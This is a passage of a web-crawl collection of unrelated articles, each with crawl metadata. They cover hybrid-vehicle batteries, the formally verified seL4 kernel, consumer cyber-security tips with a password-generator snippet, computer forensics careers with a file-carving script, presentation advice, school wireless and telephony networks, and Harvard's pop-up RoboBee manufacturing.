Desirable characteristics in a battery for HEV applications are high peak and pulse specific power, high specific energy at pulse power, high charge acceptance to maximize regenerative braking utilization, a long cycle life, and abuse resistance. All these requirements call for certain improvements in existing lead acid batteries, as they are not designed for pulse power and have low specific energy and short cycle life. The aforementioned attributes required by HEVs are being met by certain other chemistries like nickel metal hydride (Ni-MH), lithium ion (Li-ion) and lithium ion polymer, which meet some of the attributes successfully. Though the above three chemistries are suitable to an extent, aspects like recycling, performance at high temperatures and economic viability limit their acceptance and commercial production.
One of the key reasons for the slow pace in implementation of either the 42V batteries or the acceptance and wide commercial production of complete battery powered / hybrid electric vehicles is the fact that they are prohibitively expensive, due to the high cost of the batteries involved, the technology gap to meet the desired expectations, and the compatibility requirements to be met to make a successful transition from gas powered 12V automobiles.
Bipolar Lead Acid Batteries: A Suitable Option
Bipolar lead acid batteries are suitable for pulse power applications (very high power during milliseconds). Bipolar lead acid batteries, in comparison to conventional lead acid batteries, deliver higher power levels. They offer increased energy density while quadrupling power density in comparison to conventional lead acid batteries. This is made possible by the fact that they have more cells spaced closer together. The bipolar plates that connect adjacent cells have a shorter current path and a larger surface area than the connections in conventional cells. This construction reduces the power loss that is normally caused by the internal resistance of the cells.
Bipolar lead acid batteries offer a number of advantages as an energy storage device that make this technology suitable for use in battery electric / hybrid vehicles. Some of them are:
- In a bipolar construction, much less material weight is needed for electronic conduction of the current in the grid and in the cell connections in comparison to conventional lead acid batteries.
- A well established supply chain and manufacturing methodologies for lead acid batteries make it all the more reliable and provide an attractive cost equation.
- Lead as a raw material is less expensive than the other metals used in certain other battery chemistries and is recyclable to a very large extent.
- Lead acid batteries are abuse resistant to a large extent, and the nominal voltage of 2V per cell reduces the number of cells needed for the entire battery string.
Though they carry a lot of advantages, some aspects leave a lot to be desired before successful commercialization and acceptance. These include:
- A corrosion resistant, light weight, less expensive bipolar plate material is required.
- The state of charge (SOC) during cycling is often in the range of 30-70 percent, which increases the risk of sulfation and hence reduces the life of the battery.
On balance, these characteristics make the bipolar lead acid battery an attractive option for commercialization and implementation, both in existing automobiles with 12V batteries and in the upcoming 42V electrical systems.
With the implementation of 42V systems gaining ground and with the acceptance and implementation of hybrid / battery electric vehicles across the world, the demand for batteries is going to be on the rise, and this gives an explosive opportunity to any new battery technology that is economically viable and technically feasible. Lead acid batteries have proven their performance levels for years, and bipolar lead acid batteries, in addition to providing the features of conventional lead acid batteries, deliver more power with a significant reduction in weight, making them an exciting and attractive option for powering hybrid / battery electric vehicles over other existing chemistries.
For questions or comments regarding this article, please contact the analyst at email@example.com.
Stay tuned for new Frost & Sullivan Lead Acid Battery research! World Stationary, Motive, and Starting, Lighting, and Ignition Market studies are set to publish by the end of Quarter 2 2004.
<urn:uuid:fdd7e447-d8eb-4c4e-8af4-c2feea193d8e>
CC-MAIN-2017-04
https://www.frost.com/sublib/display-market-insight.do?id=17944096
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281084.84/warc/CC-MAIN-20170116095121-00011-ip-10-171-10-70.ec2.internal.warc.gz
en
0.937449
1,463
2.6875
3
Once again, our friends at sister brand Dr. Dobbs have provided me with yet more interesting blog fodder. In his editor's note in the daily Dr. Dobbs Update email, editorial director Jonathan Erickson discusses a breakthrough by Australian researchers who claimed to have developed the first "bug free" embedded software. Erickson notes that it's great to say you'd like to have bug free applications, but what happens when the underlying operating system is infested with bad code? Windows XP consists of approximately 40 million lines of code. Try finding the error in that tangle! To solve this problem, researchers at Open Kernel Labs (OK Labs) and Australia's National Information and Communications Technology Research Centre (NICTA) examined the correctness, reliability and security of the microkernel technology underlying OKL4, OK Labs' virtualization platform for mobile devices. Erickson says their approach was to "create a mathematical method for proving the correctness of the underlying source code, using formal logic and programmatic theorem checking. The verification process eliminated a wide range of exploitable errors, such as design flaws and common code-based errors, buffer overflows, null-pointer dereferences, memory leaks, arithmetic overflows, and exceptions." Once the work was done, OK Labs claimed it created "the world's first 100 percent verified 'bug free' embedded software." The researchers said this helped establish a new level of software security and reliability for mission-critical applications, such as aerospace and defense. Additionally, this same verification process can be applied to business-critical applications in mobile telephony, business intelligence, and even mobile financial transactions. Erickson drills down a bit deeper: "All in all, the researchers verified approximately 7,500 lines of source code, proving over 10,000 intermediate theorems in over 200,000 lines of formal proof. The verified code base - the seL4 kernel (short for 'secure embedded L4') - is a third-generation microkernel, comprising 8,700 lines of C code and 600 lines of assembler, that runs on ARMv6 and x86 platforms. According to OK Labs, this is the first formal proof of functional correctness of a complete, general-purpose operating-system kernel. In this case, 'functional correctness' means that the implementation always strictly follows a high-level abstract specification of kernel behavior. This includes traditional design and implementation safety properties (such as the kernel will never crash, and it will never perform an unsafe operation). It also proves that programmers can predict precisely how the kernel will behave in every possible situation." I'm not pretending to understand the minutiae of programming, but the implications of these findings seem to indicate a potential for greater reliability in mobile payments systems. OKL4 is OK Labs' virtualization application for mobile platforms. It sounds like virtualization for mobile is in its early stages, from what the company's website says, but still presents an interesting case for how mobile applications will evolve. OK Labs claims OKL4 enables mobile OEMs and semiconductor suppliers to incorporate "must-have features" into new mobile designs more quickly and less expensively. The idea is to reduce costs through hardware consolidation, allowing device manufacturers to "create smartphones at featurephone prices." So I decided to contact OK Labs and see exactly how this would help m-financial services.
According to Rob McCammon, the VP of product management, Open Kernel Labs, the main benefit will come from strong security for the mobile channel. The operating system tends to be the most attractive target to hackers in any computerized system. They exploit certain software bugs that can compromise the security of the OS, he says. Once the operating system is compromised, the rest of the software in the system is made vulnerable. "Mobile financial transactions require and benefit from strong security," he says. "Stronger security can lower the risk of financial loss from fraud or theft. Additionally, confident users of systems can lead to higher (and more secure) transactions." He concludes, "The completion of this research demonstrates that it is possible to create an operating system kernel or hypervisor that is free of a wide range of bugs. The presence of bugs in a system opens the door to attacks on a mobile phone's privileged mode software. The research shows that a higher level of security and confidence can be provided than was previously thought possible." The company hopes to bring this secure and verified "Microvisor" to market in its virtualization platforms for mobile OEMs, mobile network operators, and IT managers building mobile-to-enterprise applications. Since mobile financial services are still in their early stages (certainly in the U.S.), there haven't been many reports of exploits outside of eavesdropping on NFC signals in contactless payment transactions. This research, if broadly embraced, might help financial institutions start off on the right foot when developing mobile applications, with the security baked in from the start.
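To give a flavour of the "formal logic and programmatic theorem checking" Erickson describes, here is a toy machine-checked proof in the Lean proof assistant. The seL4 verification itself was carried out in the Isabelle/HOL prover over roughly 200,000 lines of proof; this fragment is only an illustration of the general idea and is not drawn from that work.

-- Two trivial machine-checked theorems about natural numbers (Lean 4).
-- The proof assistant refuses the file unless every proof is complete,
-- which is the same guarantee, at vastly larger scale, behind seL4.
theorem add_zero_toy (n : Nat) : n + 0 = n := rfl

theorem add_comm_toy (a b : Nat) : a + b = b + a := Nat.add_comm a b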
<urn:uuid:b5eb45c9-ee6a-40aa-aa40-bf8edf9b0c09>
CC-MAIN-2017-04
http://www.banktech.com/channels/aussies-claim-to-have-developed-bug-free-os-for-mobile-platforms/d/d-id/1293115
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00039-ip-10-171-10-70.ec2.internal.warc.gz
en
0.931916
1,003
2.5625
3
8 Simple Ways to Increase Your Cyber Security
15th November 2016 - Posted by: Juan van Niekerk - Category: Security
Cyber security has become a topic of conversation in the daily lives of just about anyone that has a mobile phone, PC, tablet or any device that connects to the internet. It is a very real concern that is, rightfully, taken very seriously, as a breach of your device could have detrimental effects, such as your personal information falling into the wrong hands, viruses infecting your device or, in extreme cases, even your identity being cloned.
The only way to truly combat cyber attacks effectively is to educate yourself on the risks, preventative measures and counter measures that can be used in order to stay safe. But not everyone has the time or means to study a course such as EC-Council’s Certified Ethical Hacker. So what can you do to prevent your devices from being hacked or infected? Below we will have a look at some simple steps that you can take to ensure that you stay safe online.
1. Password protection
The passwords that you choose for your devices, email accounts, online storage accounts and social network accounts such as Facebook are the first line of defence against cyber attacks. These should never be taken lightly, and the proper steps should be taken to ensure that you choose a strong password that will not easily be guessed or cracked. Norton Identity Safe Password Generator will create highly secure passwords, and a short do-it-yourself sketch is shown at the end of this article.
- Since you will have multiple devices and sites that will require a password for you to log in, make sure that you use a different password for each. A password manager can help you keep track of which password to use where and will ensure that they are kept safe.
- Ensure that, whichever device you may own, it is set to lock after a predetermined idle time. Use an unlock pin that is longer than 4 digits and cannot easily be guessed (such as your birthday).
- Using strong passwords to keep your accounts safe is always a good idea, but be sure to change them from time to time.
2. Manage your email accounts
- Check your emails carefully before clicking on links that are included. This pertains especially to emails from your bank or other large institutions. Very often, these are phishing emails that endeavour to gain access to your personal information or to install malware on your device. Contact the institution directly or log into your account on their site if you are unsure whether it is a legitimate email.
- If it sounds too good to be true, it probably is. Emails that promise prizes that have been won (especially those that you haven’t entered for) and promises of large sums of money are a major source of scamming.
- Never give out your personal information to anyone that you don’t fully trust. Always keep in mind that your personal information can be used against you to cause a great deal of damage.
- Gone are the days where email scams are littered with bad grammar and poor spelling. The fact that a mail comes across as professional-sounding and legit doesn’t mean that it is. Always be sceptical when opening and reading your emails.
Keep your emails protected with AVG AntiVirus FREE.
3. Use secure (HTTPS) connections
Encrypted information can only be read by yourself and the intended recipient. Always check that the URL that you are using starts with https://. This means that it is a secure connection and is often accompanied by a symbol of a padlock.
This is especially important when visiting sites where you will be entering sensitive information such as credit card numbers, address details or banking PIN numbers.
4. Social media security
- Your social media account can be read like a diary. Be sure to review your privacy settings every so often to ensure that only those that you feel comfortable with are able to see what you post.
- Be careful about the information that you share on social networking sites. Unscrupulous individuals could very easily use that information against you (such as when your home will be unattended or when your car has a faulty security system).
- Synchronise your social media account between your devices. This way you will be notified if there is strange activity on your account and corrective measures can be taken.
5. Install an antivirus program
- Download an antivirus software program to keep your computer protected. Once you have done this, make sure that you install any updates that are released.
- Do not install antivirus software from a vendor that you do not know or have not researched thoroughly. Look for well-known names and only download directly from their site.
- If it is too expensive to install a fully licensed version of your antivirus, find a free but trustworthy alternative. Look for software from companies such as Microsoft, AVG, AVAST and so forth.
6. Stay updated
Software and apps often require updates that either improve their performance or ensure that new security threats are covered. Be aware of the fact that these updates are very important and may be the key to staying safe while utilising these functions. Also ensure that your system updates are installed as often as possible. These updates can occasionally be large and may use a lot of data, but it is well worth it in ensuring that your security is kept to an optimal level.
7. Download with care
- Stay very far away from torrent sites where music, movies and the like are available for download for free using a torrent client. It is very often the case that files uploaded to these sites are infected with Trojans, malware or adware that can cause serious damage to your system.
- If you are unsure whether a site is a trustworthy source for downloads, do more research or, if no further information is available, avoid it altogether.
- If your antivirus is not set to do so automatically, scan each file that you have downloaded before opening it. Your antivirus should pick up anything that may seem suspicious and will alert you to that fact. If you suspect that a file may be infected, instruct your antivirus to deal with it accordingly.
8. Stay informed
There are a myriad of websites and publications that focus on cyber security and the risks that may be present at any given time. As cyber attacks become ever more complex and deviant in nature, so do the technologies that combat them. Be aware of any emerging technologies that can help you stay safe online and remember to keep a backup of your system, just in case you fall victim to a successful attack. This way your system can be restored to its uninfected state. Keep on top of security news and find a wealth of knowledge at the Kaspersky Lab Daily Blog.
The internet is a massive source of information, entertainment, education and business, but it can also be the source of malicious attacks to those that are unaware of the presence and danger of cyber criminals. Be sure that you understand the steps that need to be taken in order to ensure your safety while online.
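As promised in point 1, here is a minimal sketch of generating a strong random password with Python’s standard library; the length and character set are arbitrary choices, not a standard:

# Minimal password generator using Python's standard library.
import secrets
import string

ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*"

def generate_password(length=16):
    # secrets.choice draws from a cryptographically strong RNG,
    # unlike random.choice, which is not suitable for secrets.
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

print(generate_password())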
It is always better to be safe rather than sorry.
<urn:uuid:d70bcbd9-64c8-4091-983e-c85da766c301>
CC-MAIN-2017-04
https://www.itonlinelearning.com/blog/8-simple-ways-to-increase-your-cyber-security/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00039-ip-10-171-10-70.ec2.internal.warc.gz
en
0.950419
1,425
2.90625
3
Forensics Investigators: Cybercrime Fighters
Computer forensic investigation is the process of detecting hacking and other related cybercrime attacks and properly extracting evidence to report the crime, as well as conducting audits to prevent future attacks. Computer forensics is simply the application of computer investigation and analysis techniques in the interests of determining potential legal evidence. Evidence might be sought in a wide range of computer crime or misuse, including (but not limited to) fraud, theft of trade secrets and theft or destruction of intellectual property. Investigators can draw on an array of methods for discovering information that resides in a computer system or recovering deleted, encrypted or damaged file information.
Securing and analyzing electronic evidence is a central theme in an ever-increasing number of conflict situations and criminal cases. Electronic evidence is critical in the following situations:
- Disloyal employees.
- Computer break-ins.
- Possession of pornography.
- Breach of contract.
- Industrial espionage.
- E-mail fraud.
- Disputed dismissals.
- Web page defacements.
- Theft of company documents.
A computer forensics investigator is responsible for recovering data from computers that can be used in the prosecution of a criminal or in gathering evidence of a crime. But contrary to public perception, a computer forensics investigation might include equipment beyond the normal computer, including cell phones, video recorders, thumb drives, BlackBerries, PDAs and MP3 players.
Computer forensics enables the systematic and careful identification of evidence in computer-related crime and abuse cases. This might range from tracing the tracks of a hacker through a client’s systems to tracing the originator of defamatory e-mails to recovering signs of fraud.
Many computer forensics investigators are law enforcement officers or are employed by police departments. In smaller cities, however, they might be private computer experts whom the local police force uses on an as-needed basis. Computer forensic investigators might be required to testify in court to explain their role in the evidence-gathering process and to detail the evidence-recovery procedure used in that case.
The need for forensics investigators is becoming increasingly pressing. With the growth in the general digital forensics area, the need for a good solution for investigators is on the rise. One common trend observed by law enforcement agencies is that corporations worldwide try not to report any computer abuse to which they might have been subject. Why? According to a recent CSI/FBI report, this is because most of them are concerned that any such report may lead to a leak, and as a result, they might be susceptible to attack from their competitors in the court of public opinion. They are also concerned that the negative publicity might hurt their stock prices.
What is the Solution?
One possible answer is to hire internal computer-hacking forensics investigators. The fact that a corporation has an internal team that is trained and certified to deal with the art of computer forensics will significantly reduce the risk of employees trying to prey on their internal systems. Another benefit is that internally trained and certified personnel will cost a corporation much less than a typical investigation by a consultant.
A computer forensic investigator might be called in if the information for which the authorities are looking has been hidden on or erased from a computer.
Even when files have been deleted, the investigator can retrieve all or part of the evidence from the computer’s hard drive using specialized recovery programs. Forensics investigators also can work to crack or decode encryption programs that prevent information stored on the computer from being accessed. This information might be pictures, documents or other sources such as spreadsheets or databases.
Computer forensics investigators also must have good working knowledge of computer construction, as well as hard drive processes and data recovery. They have to have a great deal of patience and should be willing to work long or odd hours to try to recover information from computers that might have been erased or damaged. Understanding networking, encryption and computer crime is also important to this career.
Preparing a person to be a forensics investigator is no easy task. There are many sides to a good investigator, from analytical skills to technical knowledge. Potential investigators should study and understand the crimes or incidents they will be investigating. For instance, they ought to have good working knowledge of ethical hacking skills and possess the Certified Ethical Hacker certification, which is just one of many that will aid in creating the most well-rounded investigator.
There are quite a few certifications available, but those who seek to become computer forensics investigators must be able to distinguish between vendor-neutral and vendor-based certifications. Both will help create the best forensic investigator. EC-Council offers a vendor-neutral computer hacking forensic investigator program that prepares individuals to become forensics investigators. But upon the completion of this certification, candidates should pursue some of the specialized vendor-based certifications that will allow them to be adequately certified and trained in products and techniques.
For instance, Paraben Corp. offers multiple tiers of training associated with the seizure, analysis and presentation of data associated with mobile devices. Although this is a vendor-based certification, it still contributes to crucial skills that forensic investigators will need. Additionally, there are many other vendors that have proprietary software or equipment, including Guidance Software, which both law enforcement agencies and corporations use a great deal. Before individuals attempt any of these training programs, however, they should possess critical information about networking, ethical hacking and a deep understanding of forensics tools and procedures.
Jay Bavisi is the president of EC-Council. He can be reached at editor (at) certmag (dot) com.
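Appendix: a minimal illustration of file carving, the kind of signature-based recovery technique touched on above. It only scans a raw image for JPEG start and end markers; production recovery tools are far more careful, and the file names here are hypothetical.

# Carve candidate JPEG files out of a raw disk image (Python).
JPEG_SOI = b"\xff\xd8\xff"  # JPEG start-of-image marker
JPEG_EOI = b"\xff\xd9"      # JPEG end-of-image marker

def carve_jpegs(image_bytes):
    # Yield (start, end) offsets of candidate JPEGs in the raw image.
    pos = 0
    while True:
        start = image_bytes.find(JPEG_SOI, pos)
        if start == -1:
            return
        end = image_bytes.find(JPEG_EOI, start)
        if end == -1:
            return
        yield start, end + len(JPEG_EOI)
        pos = end + len(JPEG_EOI)

with open("disk.img", "rb") as f:  # hypothetical evidence image
    data = f.read()
for i, (start, end) in enumerate(carve_jpegs(data)):
    with open("carved_%d.jpg" % i, "wb") as out:
        out.write(data[start:end])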
<urn:uuid:9e55b603-7436-4b33-a819-b7b974e50669>
CC-MAIN-2017-04
http://certmag.com/forensics-investigators-cybercrime-fighters/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00369-ip-10-171-10-70.ec2.internal.warc.gz
en
0.93957
1,143
2.828125
3
When someone tells you that you need to attend a technical presentation, what is the first thing that goes through your mind? Do you imagine yourself watching a parade of numbers, statistics, and data points? Do you imagine an unending list of boring and unreadable PowerPoint slides? Unfortunately, this is frequently the case. Furthermore, you will often see the same mistakes from one speaker to another. You can distinguish yourself from the majority of other speakers by avoiding these common mistakes.
Drawing attention to your anxiety - Too often, an inexperienced speaker will use one of these sentences (or variations thereof) to begin the speech. Generally, the speaker does so to apologize and to get clemency from the audience. In still further situations, that speaker will apologize every time he or she makes a mistake and will offer some excuse. The audience will notice on its own that you are ill at ease. When you mention it over and over, you only encourage them to pay attention to that fact. How do you avoid this issue? Here are a few solutions:
Forgetting the audience - That is, forgetting to maintain constant contact with the audience. Speaking to a group is like a dialogue, even if there is only one person doing the speaking and the rest of the audience is only listening. Your role as a speaker is to make sure that your audience is following you throughout your speech. When you speak, maintain visual contact with your audience. Don't get distracted by your PowerPoint slides, your notes, or anything else that takes your attention away from your audience. When you maintain visual contact with the audience, you can see in their eyes and in their posture if they understand, if they are paying attention, or if they are bored. This will allow you to adjust more easily to their state of mind.
Incorrect use of PowerPoint - As a presentation tool, PowerPoint is overused. Furthermore, it is often improperly used. It is used to show large amounts of text when it should be used to display visual information. It's used as a memory jogger instead of a presentation aid. All the emphasis is put on the PowerPoint slides even though the slides should only add to the presentation. Most audiences are sick of PowerPoint presentations; nevertheless, many speakers still believe that PowerPoint adds professionalism to their speech. This is only true if it is used effectively. Otherwise, it makes you look like an amateur. Less is more is a good philosophy when using PowerPoint. There is elegance in simplicity. A simple slide is more evocative than an overloaded one. A slide with no animation is more appreciated than a slide that uses all of PowerPoint's special effects.
<urn:uuid:155a2ff6-6c67-47c4-90ed-9c5addd7b468>
CC-MAIN-2017-04
http://www.cioupdate.com/insights/article.php/3822231/Five-Mistakes-To-Avoid-During-a-Technical-Presentation.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00369-ip-10-171-10-70.ec2.internal.warc.gz
en
0.945927
534
2.625
3
The Evolution of IT
By John Parkinson

If you look at the history of evolution in natural species (assuming you believe it happens, that is), you see two sets of forces at work: both long- and short-term incremental improvements through the somewhat random mixing of characteristics (survival of the fittest -- or, more probably, of the best adapted) interspersed with rare but significant "wipe the slate clean" extinction events (I think there are four or five in the paleontological record) that change the options available in the incremental landscape in fundamental ways.

Even so, some species persist across major evolutionary discontinuities. Sharks are virtually unchanged for 300 million years, cockroaches for at least 100 million. Paleobiology calls these "keystone" species because they anchor large parts of the ecosystem across discontinuities and form a nucleus for rebuilding.

If you are willing to draw an analogy with the IT ecosystem (after all, we evolve a lot faster than biology and burn a lot more unsuccessful "species" along the way), you can see that (a) we are probably due for an extinction-event-like discontinuity sometime soon and (b) we have candidates for both shark and cockroach as keystone species.

The looming discontinuity is the energy cycle and the limits to how much energy we can invest in our IT infrastructure. We will see this manifested in the shift to cloud computing, but that's going to make the problem worse, not better, because of the concentration of energy required for large-scale data centers. A lot of today's top technology species, all evolved amidst abundant energy, will be wiped away by this.

Mainframe = shark (not dinosaur, as it is so often characterized). Not only is today's mainframe a linear descendant of the original design from 40 years ago, it has successfully absorbed the innovations (DNA) of many other "species" along the way, growing stronger and more dominant in the process. It's also remarkably energy efficient.

As for the cockroach? The microprocessor fits here. Microprocessors are everywhere, have mutated into many kinds, seemingly have minds of their own and are very hard to get rid of. Of course, they are also a critical part of the technology ecosystem (even mainframes use them) and, in the right circumstances, they create a great deal of value.

John Parkinson is CIO of TransUnion.
<urn:uuid:779d843a-fc7d-402f-bbbf-2e0ae7be51d0>
CC-MAIN-2017-04
http://blogs.cioinsight.com/it-management/evolution-of-it.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284270.95/warc/CC-MAIN-20170116095124-00093-ip-10-171-10-70.ec2.internal.warc.gz
en
0.936362
504
2.703125
3
Education - K-12 Schools

Today, the majority of classrooms are not equipped with desk phones. The existing voice system for most K-12 environments is a traditional PBX (private branch exchange), which provides a basic telecommunications link from the main office to the world outside the school. This system typically does not allow teachers to communicate with each other or enable them to be reached directly by parents. It also does not let mobile staff, such as security and maintenance personnel, communicate with teachers or office staff. In addition, most schools do not have the budget to upgrade their existing PBX and install new phone lines for every classroom. And even if they did, the outdated infrastructure probably would not support mobile users.

Schools also face the serious need to improve school safety and security. One of the major factors in these issues is inadequate communication. A teacher who is unable to react quickly and effectively to a minor problem could see it balloon into a major crisis. Should that teacher be cut off from the rest of the school in a temporary classroom or out on the playing fields, the problem is greatly exacerbated. For these reasons and more, wireless voice is a clear choice for educational institutions. Wireless technology can be used to extend voice services to areas where they are currently unavailable.

Important features for K-12 schools:
- Wireless extensions to any voice platform, over Wi-Fi or DECT
- Wireless handsets that can receive urgent text messages (e.g. fire, duress alarms, evacuation)
- A range of handsets to suit different applications (e.g. admin, outdoor, staff protection/duress)

Mobile computing initiatives are changing the way children learn in K-12 environments. Laptop carts, video learning and one-to-one computing programs have combined with small IT staffs and shrinking budgets to drive the need for a reliable and intelligent wireless network. A reliable network can mean the difference between wasted class time and a session that rapidly engages students in a rich educational experience. Fortinet makes wireless networks that simply work, enabling teachers to teach instead of dealing with IT issues.

Designed for the All-Wireless School

From the beginning, Fortinet designed its network for the All-Wireless Enterprise: an organisation that never needs to depend on wires for connectivity. For K-12 institutions, this means that a whole class of students can log on anywhere while data, voice and video are carried reliably. With industry-leading virtualized Wireless LAN technology, Fortinet delivers the most predictable and highest-performance wireless network. Whether covering classrooms, assembly halls or libraries, Fortinet provides the fastest deployment at the lowest cost.

- Wireless Like Wire. Fortinet's virtualized Wireless LAN offers all the performance that users expect from wired Ethernet combined with the mobility of cellular.
- Quality of Service. Data applications get all the bandwidth they need while toll-quality voice is assured.
- Fewer Access Points. Fortinet requires fewer access points on your campus than other solutions, stretching your IT dollars further and simplifying maintenance.
- Airtime Fairness. Each client in a packed library gets a fair share of the airwaves, letting legacy clients coexist peacefully with the latest 802.11n devices.
- Strong Security and Simple Management. The network takes control of every device's behavior, ensuring that applications get the resources they need and attackers are blocked before they connect.
Important features for K-12 schools:
- Support for wireless data, voice and video with QoS
- High user densities
- Ability to provide wireless coverage over large areas
- Simple to install / simple to manage
- Limited IT resources (in-house expertise and budget)
- Support for multiple simultaneous:
  - Wi-Fi clients (a/b/g/n) - Fortinet Airtime Fairness means WLAN performance is not influenced by slower devices
  - Devices (notebooks / netbooks / iPhones / smartphones)
  - Operating systems - Windows (XP, 7), Apple etc.

IP Telephony / UC

The cost of both wiring and maintaining a traditional PABX has historically made it prohibitive for schools to provide telephones throughout a school. With heightened security risks, increasing demands from parents to communicate with teachers, and the need to improve productivity, the model of limited voice capability in a school is rapidly becoming a thing of the past. As most schools adopt LAN data networks, the opportunity arises for schools to address these demands with a voice over IP (VoIP) telephony solution.

IP Telephony yields several benefits to K-12 schools, including:
- Lower total cost of ownership: IP Telephony lets schools leverage their existing data infrastructure to drive network costs down and cost-effectively deploy telephones in classrooms. IP Telephony also allows schools to lower network management and maintenance costs by moving to a single network environment. Lastly, IP Telephony gives schools the ability to share applications across the network, thereby cost-effectively enabling features and functionality which were not previously available or affordable.
- Improve staff productivity and reduce costs: Relevant and intuitive applications such as Outlook integration for voicemail and fax enable teachers to be more productive and responsive to parents and fellow staff members.
- Enhance school safety: An accessible IP PBX allows school administrators to proactively disseminate critical information to staff and parents during an emergency. IP Telephony also allows school administrators to communicate with teachers and staff anywhere on school grounds, thereby dramatically improving response times and outcomes during emergencies.

Important features for K-12 schools:
- Outlook integration
- Voicemail / fax to e-mail: manage calls from parents and other teachers from the office, from home, or from a smartphone (iPhone, BlackBerry etc.)
- Support for a wide range of SIP voice and video phones
- Presence and chat via the PC screen shows a teacher's availability to take calls
- Support for wireless extensions for users outside of the classroom
- Built-in conference bridge allows multiple teachers to hold telephone meetings
- Point and click: easy call handling for reception to transfer calls to teachers
- Support for both traditional (analogue or ISDN) and VoIP calls
- Call recording and monitoring
- Call reporting and logging

Network Access / Security

Education is a segment with specialised needs for public Internet access. An educational campus community demands high levels of access to both the public Internet and the institution's internal networks, and requires stringent control over management of usage and bandwidth. Both wired and wireless connection availability is expected in almost every building on campus: labs, libraries, and residence halls.
Examples of stakeholders in need of a broadband Internet connection are students, faculty, staff and official visitors.

Managing the Bring Your Own Device (BYOD) phenomenon

The challenges in managing network access are being amplified by the new generation of personal smart devices, including iPhones, tablets and other devices that students and staff want to use on campus. The BYOD phenomenon is seeing a flood of diverse Wi-Fi® devices entering networks, claiming their share of WLAN resources. Networks must be prepared to deliver secure, scalable wireless network access to a diversity of devices and users. Wireless networks should be capable of enabling one-click self-provisioning of client devices for secure 802.1x connectivity.

BYOD Guest Access Management Requirements:
- Easy-to-use, one-click self-provisioning capabilities
- Centralised, customisable portals for guest authentication
- Automatic notification services by email or SMS message
- Powerful reporting, auditing and customisation capabilities
- Secure role-based access with granular policy management, enabling differentiated levels of access

Network Access Control (NAC)

Educational institutions have security demands that are unique: K-12 school districts with shared computers and visiting laptops; boarding schools with resident students and faculty; colleges and universities with a multitude of resident and commuter students and their computers, smartphones and game consoles. All need secure access to the network. Add the visiting guests, faculty, lecturers and parents, as well as a myriad of IP-enabled devices, and network security becomes a necessity. A typical NAC deployment will (see the sketch after this list):
- Register computers, game consoles, PDAs, and other networked devices.
- Check computers for up-to-date OS patches, anti-virus and anti-spyware protection, and restricted applications such as P2P.
- Allow users to remediate any compliance issues without having to engage IT staff.
- Add access security to your wireless deployments.
- Track all network access and usage.
- Broadcast important messages and emergency notifications instantaneously to all network users.
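As a rough sketch only (the check names, roles and policies below are invented for illustration and come from no particular NAC product), the admission logic behind such a checklist might look like this:

```python
# Posture checks a device must pass before it is released from quarantine.
REQUIRED = {"os_patched", "antivirus_current", "antispyware_current"}
BANNED = {"p2p_client"}  # restricted applications

def admission_decision(role, findings):
    """Quarantine non-compliant devices for self-remediation;
    otherwise grant role-based (not blanket) network access."""
    if findings & BANNED or not REQUIRED <= findings:
        return "quarantine: redirect to self-remediation portal"
    return f"admit with access role '{role}'"

print(admission_decision("student", {"os_patched", "antivirus_current"}))
# -> quarantined, because the anti-spyware check is missing
```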
<urn:uuid:6fa46813-e932-497b-9867-1674a7fc28e8>
CC-MAIN-2017-04
http://www.wavelink.com.au/industry-solutions/education/k-12-schools.php
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284270.95/warc/CC-MAIN-20170116095124-00093-ip-10-171-10-70.ec2.internal.warc.gz
en
0.922222
1,744
2.875
3
Counterintuitively, a Harvard engineering lab specializing in research on ultra-small robots has adapted cutting-edge technology from origami and children's pop-up books into a process designed to make it possible to mass-produce tiny flying robots at a cost that might make it practical to manufacture more than one.

The process developed at the Harvard Microrobotics Laboratory is necessary to keep costs and logistics under control as the lab moves into experiments involving hives full of its RoboBee flying microbot, rather than just one or two at a time. The Microrobotics Lab specializes in developing unmanned aerial vehicles (UAVs) designed to operate in much the same way as Predator spy drones shrunk down to the size of a bug. RoboBee is one of a number of engineering research projects sponsored by defense contractor BAE Systems, which is working for the U.S. military to develop spy drones too small to be detected easily but capable enough to be piloted into buildings, training camps and other areas inaccessible to aircraft the size of a sedan. Harvard researchers project that the robot bee could also be used to pollinate fields of crops (putting real bees out of jobs) as well as for civilian surveillance missions such as search-and-rescue, traffic monitoring and exploration of hazardous environments.

The problem with developing micro-robots isn't just the size of the whole unit; it's all the things that go into making it possible and practical. In addition to the trick of designing a semi-autonomous bug-sized robot, researchers have to design components small enough that their size, weight and capacity don't pin the RoboBee to the ground or shorten its flying range so much that it would be useless as either a drone or a spy. So the Harvard lab spends as much time developing new batteries, smart sensors and better programming that can run on processors small and light enough not to overburden a machine with about the same lifting capacity as a real bee, according to lab publicity documents. They also have to find materials and manufacturing techniques that don't make producing each microrobot so slow and expensive that they waste all their time and grant money.

The manufacturing process involves pressing 18 layers of pre-cut carbon fiber into a single joined structure that expands when you pull on it until the whole robot unfolds. The RoboBee fold-out prototype is about the size of a quarter but weighs one-sixty-third as much. It has 137 joints, 22 of which fold, and 52 spots on which circuitry or components can be welded. The layered manufacturing process is similar to the way circuit boards are made: each layer is printed, cut or folded with a separate set of circuits or components that all connect neatly when the layers are pressed together into a single sheet at the end of the process. Since the technology is the same as that used by circuit-board makers, machinery for making the fold-out robo-bugs is cheap and plentiful, cutting costs down even further compared to hand assembly, which had been the only other option. Automating the technique "takes what is a craft, an artisanal process, and transforms it for automated mass production," according to graduate student Pratheev Sreetharan, who co-developed the technique.
It also makes it possible to design a whole machine with integrated electronics, manufacture it flat and make it work as a fully three-dimensional object just by pulling up on the stacked disks until the robot pops into shape, according to Rob Wood, an Associate Professor of Electrical Engineering at SEAS and a Core Faculty Member at the Wyss Institute for Biologically Inspired Engineering at Harvard. The technique applies to many types of small devices, not just RoboBees. "We can generate full systems in any three-dimensional shape," Wood says. "We've also demonstrated that we can create self-assembling devices by including pre-stressed materials."

